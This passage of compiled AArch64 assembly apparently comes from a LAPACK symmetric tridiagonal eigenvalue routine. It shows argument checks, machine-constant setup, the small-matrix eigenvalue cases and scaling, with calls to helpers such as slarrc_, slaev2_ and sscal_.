adrp x1, l_.str.2@PAGE
add x1, x1, l_.str.2@PAGEOFF
bl _lsame_
str w0, [sp, #328]
ldur x8, [x29, #-184]
ldr w8, [x8]
adds w8, w8, #1
cset w8, eq
mov w9, #1
str w9, [sp, #212] ; 4-byte Folded Spill
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
ldur x8, [x29, #-200]
ldr w8, [x8]
adds w8, w8, #1
cset w8, eq
str w8, [sp, #212] ; 4-byte Folded Spill
b LBB0_2
LBB0_2:
ldr w8, [sp, #212] ; 4-byte Folded Reload
and w8, w8, #0x1
str w8, [sp, #236]
ldur x8, [x29, #-152]
ldr w8, [x8]
adds w8, w8, #1
cset w8, eq
and w8, w8, #0x1
str w8, [sp, #232]
ldr w8, [sp, #356]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3:
ldur x8, [x29, #-64]
ldr w8, [x8]
mov w9, #18
mul w8, w8, w9
str w8, [sp, #360]
ldur x8, [x29, #-64]
ldr w8, [x8]
mov w9, #10
mul w8, w8, w9
str w8, [sp, #260]
b LBB0_5
LBB0_4:
ldur x8, [x29, #-64]
ldr w8, [x8]
mov w9, #12
mul w8, w8, w9
str w8, [sp, #360]
ldur x8, [x29, #-64]
ldr w8, [x8]
lsl w8, w8, #3
str w8, [sp, #260]
b LBB0_5
LBB0_5:
movi d0, #0000000000000000
str s0, [sp, #312]
str s0, [sp, #296]
str wzr, [sp, #228]
str wzr, [sp, #224]
str wzr, [sp, #244]
ldr w8, [sp, #308]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_7
b LBB0_6
LBB0_6:
ldur x8, [x29, #-88]
ldr s0, [x8]
str s0, [sp, #312]
ldur x8, [x29, #-96]
ldr s0, [x8]
str s0, [sp, #296]
b LBB0_10
LBB0_7:
ldr w8, [sp, #328]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_9
b LBB0_8
LBB0_8:
ldur x8, [x29, #-104]
ldr w8, [x8]
str w8, [sp, #228]
ldur x8, [x29, #-112]
ldr w8, [x8]
str w8, [sp, #224]
b LBB0_9
LBB0_9:
b LBB0_10
LBB0_10:
ldur x8, [x29, #-208]
str wzr, [x8]
ldr w8, [sp, #356]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_13
b LBB0_11
LBB0_11:
ldur x0, [x29, #-48]
adrp x1, l_.str.3@PAGE
add x1, x1, l_.str.3@PAGEOFF
bl _lsame_
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB0_13
b LBB0_12
LBB0_12:
ldur x9, [x29, #-208]
mov w8, #-1
str w8, [x9]
b LBB0_49
LBB0_13:
ldr w8, [sp, #332]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_17
b LBB0_14
LBB0_14:
ldr w8, [sp, #308]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_17
b LBB0_15
LBB0_15:
ldr w8, [sp, #328]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_17
b LBB0_16
LBB0_16:
ldur x9, [x29, #-208]
mov w8, #-2
str w8, [x9]
b LBB0_48
LBB0_17:
ldur x8, [x29, #-64]
ldr w8, [x8]
subs w8, w8, #0
cset w8, ge
tbnz w8, #0, LBB0_19
b LBB0_18
LBB0_18:
ldur x9, [x29, #-208]
mov w8, #-3
str w8, [x9]
b LBB0_47
LBB0_19:
ldr w8, [sp, #308]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_23
b LBB0_20
LBB0_20:
ldur x8, [x29, #-64]
ldr w8, [x8]
subs w8, w8, #0
cset w8, le
tbnz w8, #0, LBB0_23
b LBB0_21
LBB0_21:
ldr s0, [sp, #296]
ldr s1, [sp, #312]
fcmp s0, s1
cset w8, hi
tbnz w8, #0, LBB0_23
b LBB0_22
LBB0_22:
ldur x9, [x29, #-208]
mov w8, #-7
str w8, [x9]
b LBB0_46
LBB0_23:
ldr w8, [sp, #328]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_27
b LBB0_24
LBB0_24:
ldr w8, [sp, #228]
subs w8, w8, #1
cset w8, lt
tbnz w8, #0, LBB0_26
b LBB0_25
LBB0_25:
ldr w8, [sp, #228]
ldur x9, [x29, #-64]
ldr w9, [x9]
subs w8, w8, w9
cset w8, le
tbnz w8, #0, LBB0_27
b LBB0_26
LBB0_26:
ldur x9, [x29, #-208]
mov w8, #-8
str w8, [x9]
b LBB0_45
LBB0_27:
ldr w8, [sp, #328]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_31
b LBB0_28
LBB0_28:
ldr w8, [sp, #224]
ldr w9, [sp, #228]
subs w8, w8, w9
cset w8, lt
tbnz w8, #0, LBB0_30
b LBB0_29
LBB0_29:
ldr w8, [sp, #224]
ldur x9, [x29, #-64]
ldr w9, [x9]
subs w8, w8, w9
cset w8, le
tbnz w8, #0, LBB0_31
b LBB0_30
LBB0_30:
ldur x9, [x29, #-208]
mov w8, #-9
str w8, [x9]
b LBB0_44
LBB0_31:
ldur x8, [x29, #-144]
ldr w8, [x8]
subs w8, w8, #1
cset w8, lt
tbnz w8, #0, LBB0_34
b LBB0_32
LBB0_32:
ldr w8, [sp, #356]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_35
b LBB0_33
LBB0_33:
ldur x8, [x29, #-144]
ldr w8, [x8]
ldur x9, [x29, #-64]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_35
b LBB0_34
LBB0_34:
ldur x9, [x29, #-208]
mov w8, #-13
str w8, [x9]
b LBB0_43
LBB0_35:
ldur x8, [x29, #-184]
ldr w8, [x8]
ldr w9, [sp, #360]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_38
b LBB0_36
LBB0_36:
ldr w8, [sp, #236]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_38
b LBB0_37
LBB0_37:
ldur x9, [x29, #-208]
mov w8, #-17
str w8, [x9]
b LBB0_42
LBB0_38:
ldur x8, [x29, #-200]
ldr w8, [x8]
ldr w9, [sp, #260]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_41
b LBB0_39
LBB0_39:
ldr w8, [sp, #236]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_41
b LBB0_40
LBB0_40:
ldur x9, [x29, #-208]
mov w8, #-19
str w8, [x9]
b LBB0_41
LBB0_41:
b LBB0_42
LBB0_42:
b LBB0_43
LBB0_43:
b LBB0_44
LBB0_44:
b LBB0_45
LBB0_45:
b LBB0_46
LBB0_46:
b LBB0_47
LBB0_47:
b LBB0_48
LBB0_48:
b LBB0_49
LBB0_49:
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
bl _slamch_
str s0, [sp, #300]
adrp x0, l_.str.5@PAGE
add x0, x0, l_.str.5@PAGEOFF
bl _slamch_
str s0, [sp, #220]
ldr s0, [sp, #300]
ldr s1, [sp, #220]
fdiv s0, s0, s1
str s0, [sp, #240]
ldr s1, [sp, #240]
fmov s0, #1.00000000
fdiv s0, s0, s1
str s0, [sp, #292]
ldr s0, [sp, #240]
fcvt d0, s0
fsqrt d0, d0
fcvt s0, d0
stur s0, [x29, #-252]
ldr s0, [sp, #292]
fcvt d0, s0
fsqrt d0, d0
fcvt s0, d0
stur s0, [x29, #-228]
ldr s0, [sp, #300]
fcvt d0, s0
fsqrt d0, d0
fsqrt d1, d0
fmov d0, #1.00000000
fdiv d0, d0, d1
fcvt s0, d0
stur s0, [x29, #-232]
ldur s0, [x29, #-228]
ldur s1, [x29, #-232]
fcmp s0, s1
cset w8, hi
tbnz w8, #0, LBB0_51
b LBB0_50
LBB0_50:
ldur s0, [x29, #-228]
str s0, [sp, #196] ; 4-byte Folded Spill
b LBB0_52
LBB0_51:
ldur s0, [x29, #-232]
str s0, [sp, #196] ; 4-byte Folded Spill
b LBB0_52
LBB0_52:
ldr s0, [sp, #196] ; 4-byte Folded Reload
stur s0, [x29, #-256]
ldur x8, [x29, #-208]
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_73
b LBB0_53
LBB0_53:
ldr s0, [sp, #360]
scvtf s0, s0
ldur x8, [x29, #-176]
str s0, [x8, #4]
ldr w8, [sp, #260]
ldur x9, [x29, #-192]
str w8, [x9, #4]
ldr w8, [sp, #356]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_56
b LBB0_54
LBB0_54:
ldr w8, [sp, #332]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_56
b LBB0_55
LBB0_55:
ldur x8, [x29, #-64]
ldr w8, [x8]
str w8, [sp, #256]
b LBB0_65
LBB0_56:
ldr w8, [sp, #356]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_59
b LBB0_57
LBB0_57:
ldr w8, [sp, #308]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_59
b LBB0_58
LBB0_58:
ldur x1, [x29, #-64]
ldur x2, [x29, #-88]
ldur x3, [x29, #-96]
ldur x8, [x29, #-72]
add x4, x8, #4
ldur x8, [x29, #-80]
add x5, x8, #4
ldur x8, [x29, #-208]
mov x9, sp
add x10, sp, #412
str x10, [x9]
add x10, sp, #400
str x10, [x9, #8]
str x8, [x9, #16]
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
add x6, sp, #300
add x7, sp, #256
bl _slarrc_
b LBB0_64
LBB0_59:
ldr w8, [sp, #356]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_62
b LBB0_60
LBB0_60:
ldr w8, [sp, #328]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_62
b LBB0_61
LBB0_61:
ldr w8, [sp, #224]
ldr w9, [sp, #228]
subs w8, w8, w9
add w8, w8, #1
str w8, [sp, #256]
b LBB0_63
LBB0_62:
str wzr, [sp, #256]
b LBB0_63
LBB0_63:
b LBB0_64
LBB0_64:
b LBB0_65
LBB0_65:
ldr w8, [sp, #232]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_68
b LBB0_66
LBB0_66:
ldur x8, [x29, #-208]
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_68
b LBB0_67
LBB0_67:
ldur w8, [x29, #-212]
add w8, w8, #1
stur w8, [x29, #-220]
ldr s0, [sp, #256]
scvtf s0, s0
ldur x8, [x29, #-136]
ldursw x9, [x29, #-220]
lsl x9, x9, #3
str s0, [x8, x9]
ldur x8, [x29, #-136]
ldursw x9, [x29, #-220]
add x8, x8, x9, lsl #3
movi d0, #0000000000000000
str s0, [x8, #4]
b LBB0_72
LBB0_68:
ldur x8, [x29, #-152]
ldr w8, [x8]
ldr w9, [sp, #256]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_71
b LBB0_69
LBB0_69:
ldr w8, [sp, #232]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_71
b LBB0_70
LBB0_70:
ldur x9, [x29, #-208]
mov w8, #-14
str w8, [x9]
b LBB0_71
LBB0_71:
b LBB0_72
LBB0_72:
b LBB0_73
LBB0_73:
ldur x8, [x29, #-208]
ldr w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_75
b LBB0_74
LBB0_74:
ldur x8, [x29, #-208]
ldr w9, [x8]
mov w8, #0
subs w8, w8, w9
sub x1, x29, #220
stur w8, [x29, #-220]
adrp x0, l_.str.7@PAGE
add x0, x0, l_.str.7@PAGEOFF
mov w2, #6
bl _xerbla_
stur wzr, [x29, #-36]
b LBB0_221
LBB0_75:
ldr w8, [sp, #236]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_77
b LBB0_76
LBB0_76:
ldr w8, [sp, #232]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_78
b LBB0_77
LBB0_77:
stur wzr, [x29, #-36]
b LBB0_221
LBB0_78:
b LBB0_79
LBB0_79:
ldur x8, [x29, #-120]
str wzr, [x8]
ldur x8, [x29, #-64]
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_81
b LBB0_80
LBB0_80:
stur wzr, [x29, #-36]
b LBB0_221
LBB0_81:
ldur x8, [x29, #-64]
ldr w8, [x8]
subs w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB0_93
b LBB0_82
LBB0_82:
ldr w8, [sp, #332]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_84
b LBB0_83
LBB0_83:
ldr w8, [sp, #328]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_85
b LBB0_84
LBB0_84:
ldur x9, [x29, #-120]
mov w8, #1
str w8, [x9]
ldur x8, [x29, #-72]
ldr s0, [x8, #4]
ldur x8, [x29, #-128]
str s0, [x8, #4]
b LBB0_89
LBB0_85:
ldr s0, [sp, #312]
ldur x8, [x29, #-72]
ldr s1, [x8, #4]
fcmp s0, s1
cset w8, pl
tbnz w8, #0, LBB0_88
b LBB0_86
LBB0_86:
ldr s0, [sp, #296]
ldur x8, [x29, #-72]
ldr s1, [x8, #4]
fcmp s0, s1
cset w8, lt
tbnz w8, #0, LBB0_88
b LBB0_87
LBB0_87:
ldur x9, [x29, #-120]
mov w8, #1
str w8, [x9]
ldur x8, [x29, #-72]
ldr s0, [x8, #4]
ldur x8, [x29, #-128]
str s0, [x8, #4]
b LBB0_88
LBB0_88:
b LBB0_89
LBB0_89:
ldr w8, [sp, #356]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_92
b LBB0_90
LBB0_90:
ldr w8, [sp, #232]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_92
b LBB0_91
LBB0_91:
ldur w9, [x29, #-212]
mov w8, #1
add w9, w9, #1
stur w9, [x29, #-220]
ldur x9, [x29, #-136]
ldursw x10, [x29, #-220]
lsl x10, x10, #3
fmov s0, #1.00000000
str s0, [x9, x10]
ldur x9, [x29, #-136]
ldursw x10, [x29, #-220]
add x9, x9, x10, lsl #3
movi d0, #0000000000000000
str s0, [x9, #4]
ldur x9, [x29, #-160]
str w8, [x9, #4]
ldur x9, [x29, #-160]
str w8, [x9, #8]
b LBB0_92
LBB0_92:
stur wzr, [x29, #-36]
b LBB0_221
LBB0_93:
ldur x8, [x29, #-64]
ldr w8, [x8]
subs w8, w8, #2
cset w8, ne
tbnz w8, #0, LBB0_133
b LBB0_94
LBB0_94:
ldr w8, [sp, #356]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_96
b LBB0_95
LBB0_95:
ldur x8, [x29, #-72]
add x0, x8, #4
ldur x8, [x29, #-80]
add x1, x8, #4
ldur x8, [x29, #-72]
add x2, x8, #8
add x3, sp, #352
add x4, sp, #348
bl _slae2_
b LBB0_100
LBB0_96:
ldr w8, [sp, #356]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_99
b LBB0_97
LBB0_97:
ldr w8, [sp, #232]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_99
b LBB0_98
LBB0_98:
ldur x8, [x29, #-72]
add x0, x8, #4
ldur x8, [x29, #-80]
add x1, x8, #4
ldur x8, [x29, #-72]
add x2, x8, #8
add x3, sp, #352
add x4, sp, #348
add x5, sp, #340
add x6, sp, #316
bl _slaev2_
b LBB0_99
LBB0_99:
b LBB0_100
LBB0_100:
ldr w8, [sp, #332]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_106
b LBB0_101
LBB0_101:
ldr w8, [sp, #308]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_104
b LBB0_102
LBB0_102:
ldr s0, [sp, #348]
ldr s1, [sp, #312]
fcmp s0, s1
cset w8, le
tbnz w8, #0, LBB0_104
b LBB0_103
LBB0_103:
ldr s0, [sp, #348]
ldr s1, [sp, #296]
fcmp s0, s1
cset w8, ls
tbnz w8, #0, LBB0_106
b LBB0_104
LBB0_104:
ldr w8, [sp, #328]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_116
b LBB0_105
LBB0_105:
ldr w8, [sp, #228]
subs w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB0_116
b LBB0_106
LBB0_106:
ldur x9, [x29, #-120]
ldr w8, [x9]
add w8, w8, #1
str w8, [x9]
ldr s0, [sp, #348]
ldur x8, [x29, #-128]
ldur x9, [x29, #-120]
ldrsw x9, [x9]
str s0, [x8, x9, lsl #2]
ldr w8, [sp, #356]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_115
b LBB0_107
LBB0_107:
ldr w8, [sp, #232]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_115
b LBB0_108
LBB0_108:
ldur x8, [x29, #-120]
ldr w8, [x8]
ldur w9, [x29, #-212]
mul w8, w8, w9
add w8, w8, #1
stur w8, [x29, #-220]
ldr s0, [sp, #316]
fneg s0, s0
stur s0, [x29, #-228]
ldur s0, [x29, #-228]
ldur x8, [x29, #-136]
ldursw x9, [x29, #-220]
lsl x9, x9, #3
str s0, [x8, x9]
ldur x8, [x29, #-136]
ldursw x9, [x29, #-220]
add x8, x8, x9, lsl #3
movi d0, #0000000000000000
str s0, [x8, #4]
ldur x8, [x29, #-120]
ldr w8, [x8]
ldur w9, [x29, #-212]
mul w8, w8, w9
add w8, w8, #2
stur w8, [x29, #-220]
ldr s1, [sp, #340]
ldur x8, [x29, #-136]
ldursw x9, [x29, #-220]
lsl x9, x9, #3
str s1, [x8, x9]
ldur x8, [x29, #-136]
ldursw x9, [x29, #-220]
add x8, x8, x9, lsl #3
str s0, [x8, #4]
ldr s0, [sp, #316]
fcmp s0, #0.0
cset w8, eq
tbnz w8, #0, LBB0_113
b LBB0_109
LBB0_109:
ldr s0, [sp, #340]
fcmp s0, #0.0
cset w8, eq
tbnz w8, #0, LBB0_111
b LBB0_110
LBB0_110:
ldur x9, [x29, #-160]
ldur x8, [x29, #-120]
ldr w8, [x8]
lsl w10, w8, #1
mov w8, #1
subs w10, w10, #1
str w8, [x9, w10, sxtw #2]
ldur x9, [x29, #-160]
ldur x8, [x29, #-120]
ldr w8, [x8]
lsl w10, w8, #1
mov w8, #2
str w8, [x9, w10, sxtw #2]
b LBB0_112
LBB0_111:
ldur x9, [x29, #-160]
ldur x8, [x29, #-120]
ldr w8, [x8]
lsl w10, w8, #1
mov w8, #1
subs w10, w10, #1
str w8, [x9, w10, sxtw #2]
ldur x9, [x29, #-160]
ldur x10, [x29, #-120]
ldr w10, [x10]
lsl w10, w10, #1
str w8, [x9, w10, sxtw #2]
b LBB0_112
LBB0_112:
b LBB0_114
LBB0_113:
ldur x9, [x29, #-160]
ldur x8, [x29, #-120]
ldr w8, [x8]
lsl w8, w8, #1
subs w10, w8, #1
mov w8, #2
str w8, [x9, w10, sxtw #2]
ldur x9, [x29, #-160]
ldur x10, [x29, #-120]
ldr w10, [x10]
lsl w10, w10, #1
str w8, [x9, w10, sxtw #2]
b LBB0_114
LBB0_114:
b LBB0_115
LBB0_115:
b LBB0_116
LBB0_116:
ldr w8, [sp, #332]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_122
b LBB0_117
LBB0_117:
ldr w8, [sp, #308]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_120
b LBB0_118
LBB0_118:
ldr s0, [sp, #352]
ldr s1, [sp, #312]
fcmp s0, s1
cset w8, le
tbnz w8, #0, LBB0_120
b LBB0_119
LBB0_119:
ldr s0, [sp, #352]
ldr s1, [sp, #296]
fcmp s0, s1
cset w8, ls
tbnz w8, #0, LBB0_122
b LBB0_120
LBB0_120:
ldr w8, [sp, #328]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_132
b LBB0_121
LBB0_121:
ldr w8, [sp, #224]
subs w8, w8, #2
cset w8, ne
tbnz w8, #0, LBB0_132
b LBB0_122
LBB0_122:
ldur x9, [x29, #-120]
ldr w8, [x9]
add w8, w8, #1
str w8, [x9]
ldr s0, [sp, #352]
ldur x8, [x29, #-128]
ldur x9, [x29, #-120]
ldrsw x9, [x9]
str s0, [x8, x9, lsl #2]
ldr w8, [sp, #356]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_131
b LBB0_123
LBB0_123:
ldr w8, [sp, #232]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_131
b LBB0_124
LBB0_124:
ldur x8, [x29, #-120]
ldr w8, [x8]
ldur w9, [x29, #-212]
mul w8, w8, w9
add w8, w8, #1
stur w8, [x29, #-220]
ldr s0, [sp, #340]
ldur x8, [x29, #-136]
ldursw x9, [x29, #-220]
lsl x9, x9, #3
str s0, [x8, x9]
ldur x8, [x29, #-136]
ldursw x9, [x29, #-220]
add x8, x8, x9, lsl #3
movi d0, #0000000000000000
str s0, [x8, #4]
ldur x8, [x29, #-120]
ldr w8, [x8]
ldur w9, [x29, #-212]
mul w8, w8, w9
add w8, w8, #2
stur w8, [x29, #-220]
ldr s1, [sp, #316]
ldur x8, [x29, #-136]
ldursw x9, [x29, #-220]
lsl x9, x9, #3
str s1, [x8, x9]
ldur x8, [x29, #-136]
ldursw x9, [x29, #-220]
add x8, x8, x9, lsl #3
str s0, [x8, #4]
ldr s0, [sp, #316]
fcmp s0, #0.0
cset w8, eq
tbnz w8, #0, LBB0_129
b LBB0_125
LBB0_125:
ldr s0, [sp, #340]
fcmp s0, #0.0
cset w8, eq
tbnz w8, #0, LBB0_127
b LBB0_126
LBB0_126:
ldur x9, [x29, #-160]
ldur x8, [x29, #-120]
ldr w8, [x8]
lsl w10, w8, #1
mov w8, #1
subs w10, w10, #1
str w8, [x9, w10, sxtw #2]
ldur x9, [x29, #-160]
ldur x8, [x29, #-120]
ldr w8, [x8]
lsl w10, w8, #1
mov w8, #2
str w8, [x9, w10, sxtw #2]
b LBB0_128
LBB0_127:
ldur x9, [x29, #-160]
ldur x8, [x29, #-120]
ldr w8, [x8]
lsl w10, w8, #1
mov w8, #1
subs w10, w10, #1
str w8, [x9, w10, sxtw #2]
ldur x9, [x29, #-160]
ldur x10, [x29, #-120]
ldr w10, [x10]
lsl w10, w10, #1
str w8, [x9, w10, sxtw #2]
b LBB0_128
LBB0_128:
b LBB0_130
LBB0_129:
ldur x9, [x29, #-160]
ldur x8, [x29, #-120]
ldr w8, [x8]
lsl w8, w8, #1
subs w10, w8, #1
mov w8, #2
str w8, [x9, w10, sxtw #2]
ldur x9, [x29, #-160]
ldur x10, [x29, #-120]
ldr w10, [x10]
lsl w10, w10, #1
str w8, [x9, w10, sxtw #2]
b LBB0_130
LBB0_130:
b LBB0_131
LBB0_131:
b LBB0_132
LBB0_132:
b LBB0_198
LBB0_133:
mov w8, #1
str w8, [sp, #280]
ldur x9, [x29, #-64]
ldr w9, [x9]
lsl w9, w9, #1
add w9, w9, #1
str w9, [sp, #288]
ldur x9, [x29, #-64]
ldr w10, [x9]
mov w9, #3
mul w10, w10, w9
add w10, w10, #1
str w10, [sp, #376]
ldur x10, [x29, #-64]
ldr w10, [x10]
lsl w10, w10, #2
add w10, w10, #1
stur w10, [x29, #-236]
ldur x10, [x29, #-64]
ldr w10, [x10]
mov w11, #5
mul w10, w10, w11
add w10, w10, #1
str w10, [sp, #404]
ldur x10, [x29, #-64]
ldr w10, [x10]
mov w11, #6
mul w10, w10, w11
add w10, w10, #1
str w10, [sp, #268]
str w8, [sp, #272]
ldur x8, [x29, #-64]
ldr w8, [x8]
add w8, w8, #1
str w8, [sp, #320]
ldur x8, [x29, #-64]
ldr w8, [x8]
lsl w8, w8, #1
add w8, w8, #1
str w8, [sp, #368]
ldur x8, [x29, #-64]
ldr w8, [x8]
mul w8, w8, w9
add w8, w8, #1
str w8, [sp, #284]
fmov s0, #1.00000000
str s0, [sp, #380]
ldur x1, [x29, #-64]
ldur x8, [x29, #-72]
add x2, x8, #4
ldur x8, [x29, #-80]
add x3, x8, #4
adrp x0, l_.str.8@PAGE
add x0, x0, l_.str.8@PAGEOFF
bl _slanst_
str s0, [sp, #408]
ldr s0, [sp, #408]
fcmp s0, #0.0
cset w8, le
tbnz w8, #0, LBB0_136
b LBB0_134
LBB0_134:
ldr s0, [sp, #408]
ldur s1, [x29, #-252]
fcmp s0, s1
cset w8, pl
tbnz w8, #0, LBB0_136
b LBB0_135
LBB0_135:
ldur s0, [x29, #-252]
ldr s1, [sp, #408]
fdiv s0, s0, s1
str s0, [sp, #380]
b LBB0_139
LBB0_136:
ldr s0, [sp, #408]
ldur s1, [x29, #-256]
fcmp s0, s1
cset w8, le
tbnz w8, #0, LBB0_138
b LBB0_137
LBB0_137:
ldur s0, [x29, #-256]
ldr s1, [sp, #408]
fdiv s0, s0, s1
str s0, [sp, #380]
b LBB0_138
LBB0_138:
b LBB0_139
LBB0_139:
ldr s0, [sp, #380]
fmov s1, #1.00000000
fcmp s0, s1
cset w8, eq
tbnz w8, #0, LBB0_143
b LBB0_140
LBB0_140:
ldur x0, [x29, #-64]
ldur x8, [x29, #-72]
add x2, x8, #4
add x1, sp, #380
str x1, [sp, #176] ; 8-byte Folded Spill
adrp x3, _c__1@PAGE
add x3, x3, _c__1@PAGEOFF
str x3, [sp, #184] ; 8-byte Folded Spill
bl _sscal_
ldr x1, [sp, #176] ; 8-byte Folded Reload
ldr x3, [sp, #184] ; 8-byte Folded Reload
ldur x8, [x29, #-64]
ldr w8, [x8]
subs w8, w8, #1
sub x0, x29, #220
stur w8, [x29, #-220]
ldur x8, [x29, #-80]
add x2, x8, #4
bl _sscal_
ldr s1, [sp, #380]
ldr s0, [sp, #408]
fmul s0, s0, s1
str s0, [sp, #408]
ldr w8, [sp, #308]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_142
b LBB0_141
LBB0_141:
ldr s1, [sp, #380]
ldr s0, [sp, #312]
fmul s0, s0, s1
str s0, [sp, #312]
ldr s1, [sp, #380]
ldr s0, [sp, #296]
fmul s0, s0, s1
str s0, [sp, #296]
b LBB0_142
LBB0_142:
b LBB0_143
LBB0_143:
ldur x8, [x29, #-168]
ldr w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_145
b LBB0_144
LBB0_144:
ldur x0, [x29, #-64]
ldur x8, [x29, #-72]
add x1, x8, #4
ldur x8, [x29, #-80]
add x2, x8, #4
add x3, sp, #372
bl _slarrr_
b LBB0_146
LBB0_145:
mov w8, #-1
str w8, [sp, #372]
b LBB0_146
LBB0_146:
ldr w8, [sp, #372]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_148
b LBB0_147
LBB0_147:
ldr s0, [sp, #220]
str s0, [sp, #248]
b LBB0_149
LBB0_148:
ldr s0, [sp, #220]
fneg s0, s0
str s0, [sp, #248]
ldur x8, [x29, #-168]
str wzr, [x8]
b LBB0_149
LBB0_149:
ldur x8, [x29, #-168]
ldr w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_151
b LBB0_150
LBB0_150:
ldur x0, [x29, #-64]
ldur x8, [x29, #-72]
add x1, x8, #4
ldur x8, [x29, #-176]
ldursw x9, [x29, #-236]
add x3, x8, x9, lsl #2
adrp x4, _c__1@PAGE
add x4, x4, _c__1@PAGEOFF
mov x2, x4
bl _scopy_
b LBB0_151
LBB0_151:
ldur x8, [x29, #-64]
ldr w9, [x8]
mov w8, #1
subs w9, w9, #1
stur w9, [x29, #-220]
str w8, [sp, #384]
b LBB0_152
LBB0_152: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #384]
ldur w9, [x29, #-220]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB0_155
b LBB0_153
LBB0_153: ; in Loop: Header=BB0_152 Depth=1
ldur x8, [x29, #-80]
ldrsw x9, [sp, #384]
ldr s0, [x8, x9, lsl #2]
stur s0, [x29, #-228]
ldur s0, [x29, #-228]
ldur s1, [x29, #-228]
fmul s0, s0, s1
ldur x8, [x29, #-176]
ldr w9, [sp, #404]
ldr w10, [sp, #384]
add w9, w9, w10
subs w9, w9, #1
str s0, [x8, w9, sxtw #2]
b LBB0_154
LBB0_154: ; in Loop: Header=BB0_152 Depth=1
ldr w8, [sp, #384]
add w8, w8, #1
str w8, [sp, #384]
b LBB0_152
LBB0_155:
ldr w8, [sp, #356]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_157
b LBB0_156
LBB0_156:
ldr s0, [sp, #220]
fmov s1, #4.00000000
fmul s0, s0, s1
str s0, [sp, #396]
ldr s0, [sp, #220]
fmul s0, s0, s1
str s0, [sp, #392]
b LBB0_164
LBB0_157:
ldr s0, [sp, #220]
fcvt d0, s0
fsqrt d0, d0
adrp x8, lCPI0_1@PAGE
ldr d1, [x8, lCPI0_1@PAGEOFF]
fmul d0, d0, d1
fcvt s0, d0
stur s0, [x29, #-228]
ldr s0, [sp, #220]
fmov s1, #4.00000000
fmul s0, s0, s1
stur s0, [x29, #-232]
ldur s0, [x29, #-228]
ldur s1, [x29, #-232]
fcmp s0, s1
cset w8, lt
tbnz w8, #0, LBB0_159
b LBB0_158
LBB0_158:
ldur s0, [x29, #-228]
str s0, [sp, #172] ; 4-byte Folded Spill
b LBB0_160
LBB0_159:
ldur s0, [x29, #-232]
str s0, [sp, #172] ; 4-byte Folded Spill
b LBB0_160
LBB0_160:
ldr s0, [sp, #172] ; 4-byte Folded Reload
str s0, [sp, #396]
ldr s0, [sp, #220]
fcvt d0, s0
fsqrt d0, d0
adrp x8, lCPI0_0@PAGE
ldr d1, [x8, lCPI0_0@PAGEOFF]
fmul d0, d0, d1
fcvt s0, d0
